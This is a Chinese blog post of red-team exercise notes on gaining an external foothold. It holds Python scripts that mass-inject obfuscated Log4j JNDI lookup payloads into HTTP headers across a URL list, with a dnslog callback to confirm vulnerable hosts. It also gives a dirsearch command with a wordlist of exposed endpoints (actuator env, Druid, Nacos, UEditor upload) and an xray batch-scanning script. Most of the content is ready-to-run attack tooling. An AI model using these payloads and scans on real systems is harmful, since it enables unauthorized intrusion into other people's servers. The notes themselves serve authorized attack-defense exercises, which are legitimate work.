前言

一场比赛最重要的环节就是外网打点，外网没点进不了内网一切都白瞎，在我的印象中，这几年比较火的漏洞是shiro 550/springboot rce/log4j rce。第一时间肯定要先扫描提供的资产是不是存在上面的漏洞，快速打点。当然各大oa还财务系统也存在各种漏洞。 # 批量漏洞扫描 ## log4j

fuzz spring

import requests
import api.read_file
import urllib3
import hashlib
urllib3.disable_warnings()
q = b'icon_hash="116323821" && country="CN"'

# url_list = api.fofa_api.get_url(base64.b64encode(q), 4)
url_list = api.read_file.get_url_list('url.txt')
hl = hashlib.md5()
for url in url_list:
    hl.update(url.encode(encoding='utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    dnslog = 'dnslog'
    accept = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    header = {
        'Accept': accept
    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('请求出现异常')

fuzz 全部header

import requests
import api.read_file
import urllib3
import hashlib
urllib3.disable_warnings()

url_list = api.read_file.get_url_list('url.txt')
hl = hashlib.md5()
for url in url_list:
    hl.update(url.encode(encoding='utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    dnslog = 'dnslog'
    poc = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    header = {
        'Accept': 'accept' + '.' + poc,
        'X-Client-IP': 'X-Client-IP' + '.' + poc,
        'X-Remote-IP': 'X-Remote-IP' + '.' + poc,
        'X-Remote-Addr': 'X-Remote-Addr' + '.' + poc,
        'X-Forwarded-For': 'X-Forwarded-For' + '.' + poc,
        'X-Originating-IP': 'X-Originating-IP' + '.' + poc,
        'User-Agent': 'User-Agent' + '.' + poc,
        'Referer': 'Referer' + '.' + poc,
        'Authorization': 'Authorization' + '.' + poc

    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('请求出现异常')

shiro

直接把所有流量走一遍burpsuite或者xray，效率最高。

telnet 无密码

使用webfinder-3.2可以扫描telnet默认密码

dirsearch使用自定义字典进行批量扫描

python ..py -w D:.txt -l "C:.txt" -p socks5://127.0.0.1:7772

/actuator/env
/admin/v2/api-docs
/api/actuator/env
/api/druid/index.html
/api/env
/api/v1/api-docs
/api/v2/api-docs
/api/v3/api-docs
/druid/index.html
/env
/nacos/
/service
/Service.asmx?wsdl
/statics/ueditor/php/controller.php?action=uploadfile
/swagger-ui.html
/swagger/v1/swagger.json
/UEditor/asp/controller.asp?action=uploadfile
/ueditor/php/controller.php?action=uploadfile
/v1/api-docs
/v2/api-docs
/v3/api-docs

xray多线程扫描

import os
import time
import random
import string
import subprocess

file_path = '../asset/out'
for filename in os.listdir(file_path):
    t = time.time()
    html_filename = str(int(t)) + "".join(random.sample(string.ascii_letters + string.digits, 5)) + '.html'
    cmd = ['xray', 'ws', '--url-file', filename, '--html-output', html_filename]
    subprocess.Popen(cmd, creationflags=subprocess.CREATE_NEW_CONSOLE)

#hvv #漏洞扫描

漏洞扫描

https://blog.njcit.me/2023/02/17/华为行动/漏洞扫描/

作者

ccadmin

发布于

2023年2月17日

许可协议

scoop基础使用上一篇

攻防演练学习笔记下一篇